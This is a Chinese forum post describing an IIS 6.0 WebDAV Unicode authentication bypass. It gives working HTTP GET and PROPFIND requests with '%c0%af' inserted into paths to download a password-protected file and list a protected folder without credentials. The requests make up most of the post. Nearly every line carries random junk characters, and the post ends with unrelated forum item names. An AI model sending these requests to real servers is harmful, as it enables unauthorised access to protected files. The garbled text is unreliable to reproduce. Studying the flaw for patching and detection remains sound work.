|
漏洞发现者:Nikolaos Rangos
/ V' g0 z( [& K7 I具体漏洞存在于带WebDAV功能的IIS 6.0中
0 k! A. Y6 j3 vWeb服务器没有正确地处理Unicode命令的URI时,解析和发送回的数据.
7 f! ]: A; }# p假设有一个密码保护文件夹d:\inetpub\wwwroot\protected\
2 g; D& @/ t! I此文件夹内有一个名为 protected.zip "
, q8 G! I( |' Q, _/ b. i) Y向服务器发送一个HTTP GET请求' j: o/ v4 q4 u" S6 q
GET / %c0%af/protected/protected.zip HTTP/1.1
4 S8 X; f# F# N+ i' F: v Translate: f
- T" [" J. Q8 l: G% ~ Connection: close! p9 L6 s8 M. y" J5 C; N
Host: servernameMu2 m g V! G n ~" V6 F; F
指示Web服务器处理请求使用 WebDAV的
$ d4 D, X" S6 U利用这种恶意的URI构建网络服务器发送文件到; N5 p0 e) H# R$ E
/protected/ protected.zip ”而不要求进行适当的验证" ?% f) {' W/ ?0 b8 m- ^2 P
另一个有效的请求可能会传送到Web服务器是: GET /prot%c0%afected/protected.zip HTTP/1.1+ k$ O8 X: b: E: i
Translate: f " T8 X1 x, c9 O& H0 {) K s
Connection: close & d8 g& t; ^* J
Host: servername
2 t/ e1 X7 i* l( P) \( S- UIIS 6.0中将会删除„%c0%af” 的请求,并发送回密码保护文件而不验证.
' j3 Q" Q# I' T" W9 G& [ASP脚本不能下载,除非以这种方式提供服务的脚本源代码是启用的 ' y8 p1 t9 a2 o, D+ D H
可以绕过访问限制的,密码保护文件夹和列表,下载,上传和修改文件
7 b7 j9 W2 R0 E S5 o* u, \; eCopy code PROPFIND /protec%c0%afted/ HTTP/1.1
# g/ D( V/ [+ ?7 I/ h) i: r Host: servername
7 @0 l3 O" ?" F0 C. {7 t6 k User-Agent: neo/0.12.2 ! a! p3 t7 g' K
Connection: TE
4 x, Z. f8 v' u TE: trailers
& o" u1 @0 K$ R1 O+ s6 x1 [- S Depth: 1
( d0 M% K( A% @2 G- L Content-Length: 288/ r3 \# W3 l% |) G$ q! ] W, m
Content-Type: application/xml; T+ T9 F; F+ R
<?xml version="1.0" encoding="utf-8"?>
. ?2 e& f6 u8 V; K# U- u6 Q <propfind xmlns="DAV:"><prop>
3 k/ m5 L$ \0 ]. z" G- W <getcontentlength xmlns="DAV:"/>9 B" ]4 \) {/ Z" d t5 O
<getlastmodified xmlns="DAV:"/> ; ]) t5 P- c0 ^2 D, X8 Z1 \
<executable xmlns="http://apache.org/dav/props/"/> ~; [2 e0 [1 o; n
<resourcetype xmlns="DAV:"/>. I6 d2 x$ T+ W, u U+ p! B6 J
<checked-in xmlns="DAV:"/>
+ x- A1 R2 @5 }9 a <checked-out xmlns="DAV:"/>5 e* x' Q* }0 y3 y2 L; K* `! Z' |
</prop></propfind> IIS的回应的目录列表的文件夹中没有要求输入密码 $ T3 o- ^. P1 z* j) Y
|
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
千斤顶
显身卡
